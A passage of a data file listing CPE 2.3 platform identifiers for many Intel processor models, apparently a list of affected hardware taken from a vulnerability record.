"cpe:2.3:h:intel:core_i3:380m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:661:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8893_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5500u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6685r:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6150:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3775d:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3610me:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3740qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2670_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5650:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:750s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4627_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2628l_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2730:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4570s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:860s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6126t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2640:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4670k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3610qe:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4890_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2660_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z2560:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2407:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5647:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2687w_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1275_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2697a_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2620:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6098p:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2448l:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:5115:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4250u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4302y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1230:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5660:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3735g:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z2420:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5700hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8857_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:5575r:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8891_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:530:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n3160:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3517ue:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4260u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3570:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5680:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4700mq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2310:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4670r:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n4000:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:5350h:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_silver:4114t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4350t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:670:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2435m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:5015u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2500t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6157u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1285l_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:2830:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2418l:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1240_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4809_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l5640:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_silver:4108:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:580m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:330e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6140m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1275l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:8700k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2623_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5645:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4100m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e-1105c:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5775c:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1280:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2467m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1286l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2683_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2603_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2630_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_silver:4109t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3770:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3537u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4700hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2658_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4170t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2699_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2643_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3115c:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l5530:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2630l_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_phi:7230:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4158u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4340te:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4607:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3775:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4200m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2430_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2660:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2630l_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3770s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3560:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2830:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2650_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_bronze_3104:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5603:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1630_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2308:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4112e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2365m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4020y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2680_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2820qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:920xm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3340s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3229y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8168:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2637_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4400e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2617m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1240_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2643_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:5005u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3840qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2698_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1620_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5750hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2648l_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8156:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:460m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x3430:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2920xm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:pentium_j:j3710:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2677m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:380um:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:2890_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4770k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2640_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5503:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4310m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:330m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:660um:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:520m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4440:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:870s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3520m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:pentium_n:n3530:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2930:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_bronze_3106:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1290_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l5518:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2630_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2650:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1240l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2358:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2715qe:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1275_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5607:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4410e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2403:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2630qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4690t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4627_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1230_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2125:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2637:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m5:6y54:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8860_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3240t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6440eq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1281_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3210:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3540m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:pentium_n:n3520:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4300u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5775r:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z2480:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n3350:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2687w_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m:5y51:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2667_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4870_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3808:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2316:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1620:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4402e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2428l:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e7530:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6300hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4590:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:520um:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4880_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3570t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1230_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:5120:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1245_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2650l:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2130:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4170:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_x3:c3295rk:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2470_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2400:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4655_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3330s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8153:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2500:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5677:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7820hk:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1660_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3130m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2608l_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1505m_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6350hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2690_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:680um:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2815:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3955:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2418l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:5300u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l5618:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:750:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3:1505m_v6:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3220t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1240l_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4850_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2700k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4655_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1230l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5649:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2400s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5700eq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4690s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n3450:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4700eq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6134:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3830:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4670t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6140:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1245_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2660_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:3120m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1270_v5:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3850:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3770t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1220:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m:5y10a:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2100:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4330m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4765t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4440s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2635qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5687:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n3060:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z2520:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2330m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:pentium_n:n3700:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2680:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1278l_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4640:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2697_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4258u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_phi:7295:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:950:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2637_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_x3:c3205rk:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4760hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1650_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_x3:c3235rk:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z2760:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7700t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:620um:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4110e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2808:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:5675c:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6600k:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2620m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6400t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4900mq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3:1535m_v5:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5550:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1280_v6:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2338:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l5506:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4722hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2550:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:540m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3480:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2620_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1240_v6:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4702mq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4809_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2520m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6320:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1240:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1235:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:5675r:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2649m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6128:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2450l_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:660ue:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8891_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3350p:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:540um:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4820_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:ec5549:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:5119t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:8100:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m3:7y30:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_silver:4114:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1225_v6:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2650_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8870:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2637m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:430um:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4640_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1265l_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4807:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2650l_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6260u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3736f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1230_v6:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6402p:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:8837:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2697_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:970:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_1620_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:l5520:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3470s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2687w:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_j:j3455:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3770d:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_x3:c3200rk:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4650:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4130t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4660_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_j:j4105:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2375m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:e5540:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2557m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1275_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:520e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4100u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1285_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2618l_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:pentium_j:j2850:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:5122:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4300m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4830:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:390m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4010u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4830_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:8650u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:5020u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6100h:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6300u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3:1558l_v5:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4870:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2618l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4030u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:ec5539:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:880:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:5600u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3360m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3437u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8170:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2516:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:2320:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1276_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:4005u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2310m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3558:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4860hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_e:e3845:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3735e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4640_v3:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4610_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x3470:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3687u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2609_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4771:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3460:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2650_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4220y:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_x3:c3130:*:*:*:*:*:*:*", 